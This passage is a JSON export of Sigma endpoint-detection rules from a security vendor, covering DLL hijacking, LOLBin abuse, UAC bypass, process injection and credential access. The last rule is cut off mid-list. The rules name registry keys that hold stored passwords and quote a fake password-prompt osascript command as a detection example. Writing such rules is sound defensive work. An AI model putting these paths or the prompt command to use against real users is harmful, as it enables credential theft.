"references": [
"https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html"
],
"name": "t1574_002_prepare_persistence_dll_hijack_task_scheduler_wptsextensions.yml",
"content": "title: Task Scheduler Service DLL Hijack Prepared\nid: a6fc5220-9841-48e3-8d9e-6ef2f233f780\ndescription: |\n Detects the creation of a DLL named WptsExtensions.dll, which is loaded by the Task Scheduler service from multiple directories, a DLL which is therefore prone to DLL hijacking.\n Adversaries may plant the DLL in a PATH folder in order to execute malicious code within the context of the scheduler service.\n It is recommended to check the DLL for malicious content or purpose and to analyze the process responsible for its creation.\nreferences:\n - https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html\ndate: 2020/09/28\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\WptsExtensions.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6fc5220-9841-48e3-8d9e-6ef2f233f780",
"rule_name": "Task Scheduler Service DLL Hijack Prepared",
"rule_description": "Detects the creation of a DLL named WptsExtensions.dll, which is loaded by the Task Scheduler service from multiple directories, a DLL which is therefore prone to DLL hijacking.\nAdversaries may plant the DLL in a PATH folder in order to execute malicious code within the context of the scheduler service.\nIt is recommended to check the DLL for malicious content or purpose and to analyze the process responsible for its creation.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a7400b79-0aa3-4d56-849c-cae54769dd2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088591Z",
"creation_date": "2026-03-23T11:45:34.088593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088598Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://attack.mitre.org/techniques/T1218/008/"
],
"name": "t1218_odbcconf.yml",
"content": "title: Odbcconf.exe Execution\nid: a7400b79-0aa3-4d56-849c-cae54769dd2a\ndescription: |\n Detects execution of legitimate \"odbcconf.exe\" Windows binary, a command-line tool that allows to configure ODBC drivers and data source names.\n This binary can be used as a LOLBin in order to load malicious DLLs.\n It is recommended to investigate the DLL loaded by \"odbcconf.exe\" as well as the parent process for suspicious activities.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n - https://attack.mitre.org/techniques/T1218/008/\ndate: 2022/06/30\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Odbcconf\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'odbcconf.exe'\n CommandLine|contains:\n - ' /f '\n - ' -f '\n - ' /a '\n - ' -a '\n\n exclusion_sql:\n CommandLine|contains:\n - 'CONFIGSYSDSN ODBC Driver'\n - 'CONFIGSYSDSN MySQL ODBC'\n - 'CONFIGDSN SQL Server'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a7400b79-0aa3-4d56-849c-cae54769dd2a",
"rule_name": "Odbcconf.exe Execution",
"rule_description": "Detects execution of legitimate \"odbcconf.exe\" Windows binary, a command-line tool that allows to configure ODBC drivers and data source names.\nThis binary can be used as a LOLBin in order to load malicious DLLs.\nIt is recommended to investigate the DLL loaded by \"odbcconf.exe\" as well as the parent process for suspicious activities.\n",
"rule_creation_date": "2022-06-30",
"rule_modified_date": "2025-03-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a790c44e-924f-45f9-9524-04a2235c5441",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092575Z",
"creation_date": "2026-03-23T11:45:34.092579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/bypassuac_sluihijack",
"https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-17---uacme-bypass-method-61"
],
"name": "t1548_002_post_uac_bypass_slui.yml",
"content": "title: UAC Bypass Executed via slui\nid: a790c44e-924f-45f9-9524-04a2235c5441\ndescription: |\n Detects an unusual process being spawned by slui.exe.\n This alert can be indicative of a successful User Account Control Bypass and is the result of the execution of slui.exe after a registry modification.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate for suspicious registry modification by the process launching slui.exe near its execution and to look for other suspicious actions on the host.\nreferences:\n - https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/bypassuac_sluihijack\n - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-17---uacme-bypass-method-61\ndate: 2022/12/05\nmodified: 2025/05/02\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent_slui:\n ParentImage|endswith: '\\slui.exe'\n\n selection_parent_changepk:\n GrandparentImage|endswith: '\\slui.exe'\n ParentImage|endswith: '\\changepk.exe'\n\n exclusion_slui_legitimate:\n Image:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n - '?:\\Program Files\\Internet Explorer\\iexplore.exe'\n - '?:\\Program Files\\Mozilla Firefox\\firefox.exe'\n - '?:\\Windows\\System32\\LicensingUI.exe'\n - '?:\\Windows\\System32\\slui.exe'\n - '?:\\Windows\\System32\\changepk.exe'\n - '?:\\Windows\\System32\\phoneactivate.exe'\n\n exclusion_changepk_legitimate:\n Image: '?:\\Windows\\System32\\ClipUp.exe'\n\n exclusion_common_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: ((selection_parent_slui and not exclusion_slui_legitimate) or (selection_parent_changepk and not exclusion_changepk_legitimate)) and not 1 of exclusion_common_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a790c44e-924f-45f9-9524-04a2235c5441",
"rule_name": "UAC Bypass Executed via slui",
"rule_description": "Detects an unusual process being spawned by slui.exe.\nThis alert can be indicative of a successful User Account Control Bypass and is the result of the execution of slui.exe after a registry modification.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate for suspicious registry modification by the process launching slui.exe near its execution and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-12-05",
"rule_modified_date": "2025-05-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.484003Z",
"creation_date": "2026-03-23T11:45:34.088536Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088541Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1021/",
"https://gtfobins.github.io/gtfobins/telnet/"
],
"name": "t1046_telnet_linux.yml",
"content": "title: Telnet Execution\nid: a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac\ndescription: |\n Detects the execution of a Telnet client, a networking protocol that reads and writes data as cleartext across network connections.\n Telnet is an insecure protocol and is used by attackers for discovery, usually by banner-grabbing different ports and spoofing logins.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1021/\n - https://gtfobins.github.io/gtfobins/telnet/\ndate: 2023/01/03\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.telnet\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/telnet.netkit'\n - '/telnet'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/crond|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_commandline:\n - ParentCommandLine: '/bin/ksh /opt/application/*.sh *'\n - GrandparentCommandLine:\n - '/bin/bash /usr/local/scripts/*.sh'\n - '/bin/bash /opt/application/*.ksh *'\n\n exclusion_rancid:\n - CurrentDirectory|startswith: '/usr/local/rancid/'\n ProcessCommandLine|startswith: 'telnet -K '\n - Ancestors|contains: '|/usr/local/rancid/bin/par|'\n\n # template_exclusion_ansible\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac",
"rule_name": "Telnet Execution",
"rule_description": "Detects the execution of a Telnet client, a networking protocol that reads and writes data as cleartext across network connections.\nTelnet is an insecure protocol and is used by attackers for discovery, usually by banner-grabbing different ports and spoofing logins.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1046",
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a81d1443-7fa0-450c-b4f2-b2ecffec3fb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079384Z",
"creation_date": "2026-03-23T11:45:34.079386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079390Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_oobe_maintenance.yml",
"content": "title: OOBE-Maintenance.exe Sacrificial Process Spawned\nid: a81d1443-7fa0-450c-b4f2-b2ecffec3fb2\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary OOBE-Maintenance.exe, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and network activities performed by the OOBE-Maintenance.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\OOBE-Maintenance.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n # https://houseonthehill.com/\n exclusion_supdskcs:\n OriginalFileName: 'SupDskCs.exe'\n Description: 'SupportDesk Desktop'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a81d1443-7fa0-450c-b4f2-b2ecffec3fb2",
"rule_name": "OOBE-Maintenance.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary OOBE-Maintenance.exe, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and network activities performed by the OOBE-Maintenance.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a848116c-c586-4b4a-8ec6-564b415f3c6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618142Z",
"creation_date": "2026-03-23T11:45:34.618145Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618149Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osascript_prompt_user.yml",
"content": "title: User Input Prompted by Osascript\nid: a848116c-c586-4b4a-8ec6-564b415f3c6d\ndescription: |\n Detects the execution of osascript to execute an Apple Script that prompts the user for inputs.\n This could be abused by an attacker to present the user with fake dialog to gather informations (like user credentials).\n It is recommended to investigate the script along with its provenance to determine whether this action was legitimate.\nreferences:\n - https://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osascript\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # osascript -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"'\n selection:\n Image: '/usr/bin/osascript'\n CommandLine|contains|all:\n - '-e'\n - 'display'\n - 'dialog'\n - 'answer'\n\n exclusion_snap_camera:\n CommandLine|contains: 'Do you want to remove all Snap Camera related data?'\n ParentCommandLine|contains: '/Applications/Snap Camera.app'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a848116c-c586-4b4a-8ec6-564b415f3c6d",
"rule_name": "User Input Prompted by Osascript",
"rule_description": "Detects the execution of osascript to execute an Apple Script that prompts the user for inputs.\nThis could be abused by an attacker to present the user with fake dialog to gather informations (like user credentials).\nIt is recommended to investigate the script along with its provenance to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a867c7b0-919a-4aae-bf65-062b92f5a59e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624788Z",
"creation_date": "2026-03-23T11:45:34.624790Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624794Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Alh4zr3d/status/1612176163509600256",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_registry_credential_queries.yml",
"content": "title: Possibly Sensitive Registry Values Queried\nid: a867c7b0-919a-4aae-bf65-062b92f5a59e\ndescription: |\n Detects when reg.exe is used to query registry values that may contain sensitive information such as credentials.\n Attackers can misuse this technique to access sensitive information stored in specific registry keys, such as WinLogon, VNC, or PuTTY.\n It is recommended to investigate such queries, review the permissions of processes accessing the registry keys, and check for any unauthorized access to sensitive information.\nreferences:\n - https://twitter.com/Alh4zr3d/status/1612176163509600256\n - https://attack.mitre.org/techniques/T1003/\ndate: 2023/01/09\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_commandline_action:\n CommandLine|contains: 'query'\n selection_reg_values:\n CommandLine|contains:\n - '\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon'\n - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n - '\\Software\\ORL\\WinVNC3\\Password'\n\n exclusion_defaultname:\n CommandLine:\n - 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultUserName'\n - 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultDomainName'\n\n exclusion_meraki:\n - ProcessParentOriginalFileName: 'm_agent_service.exe'\n # reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoAdminLogonCurrentVersion\\Winlogon /reg:32 /v AutoAdminLogon\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n - ProcessGrandparentOriginalFileName: 'm_agent_service.exe'\n # reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoAdminLogonCurrentVersion\\Winlogon /reg:32 /v AutoAdminLogon\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n - ProcessParentImage|endswith: '\\m_agent_service.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Meraki, LLC.'\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n - ProcessGrandparentImage|endswith: '\\m_agent_service.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Meraki, LLC.'\n CommandLine|contains|all:\n - 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n - 'AutoAdminLogon'\n\n exclusion_touchify:\n ProcessParentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\co.touchify.player\\Touchify Player.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Touchify'\n\n exclusion_emacs:\n CommandLine: '?:\\Windows\\system32\\reg.exe query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions'\n ProcessParentOriginalFileName: 'emacs.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a867c7b0-919a-4aae-bf65-062b92f5a59e",
"rule_name": "Possibly Sensitive Registry Values Queried",
"rule_description": "Detects when reg.exe is used to query registry values that may contain sensitive information such as credentials.\nAttackers can misuse this technique to access sensitive information stored in specific registry keys, such as WinLogon, VNC, or PuTTY.\nIt is recommended to investigate such queries, review the permissions of processes accessing the registry keys, and check for any unauthorized access to sensitive information.\n",
"rule_creation_date": "2023-01-09",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a8b9aac2-c03f-4a42-b223-9380cae3dc1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608732Z",
"creation_date": "2026-03-23T11:45:34.608735Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608743Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua"
],
"name": "t1559_suspicious_named_pipes_connected.yml",
"content": "title: Suspicious Named Pipe Connected\nid: a8b9aac2-c03f-4a42-b223-9380cae3dc1e\ndescription: |\n Detects the opening of a suspicious named pipe used by attackers.\n This named pipe has been used by attackers in real situations and it is related with malicious code.\n It is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\ndate: 2022/07/26\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName:\n # https://github.com/klinix5/InstallerFileTakeOver/blob/361612e69a91663890030a892805e58abdf2316c/InstallerFileTakeOver/InstallerFileTakeOver.cpp#L354\n # InstallerFileTakeOver Custom variant 1 (inlined) - https://bazaar.abuse.ch/sample/f181b8ae88f6c657c3ec3d1d5e8420fbf340c543b3d9292947ae035e3591b664/\n # InstallerFileTakeOver Custom variant 3 - https://bazaar.abuse.ch/sample/1fe63ba4b112edf2e4ec228ae95db0a3867cfbb6d48c1c19857f7d76f29f066e/\n - '\\ExploitPipe'\n # InstallerFileTakeOver Custom variant 2 - https://bazaar.abuse.ch/sample/f285006661a7c47aab70034566a3f1daf6ea7d09d31ed85303d45f5f8d3c67fd/\n - '\\KartoffelPipe'\n # 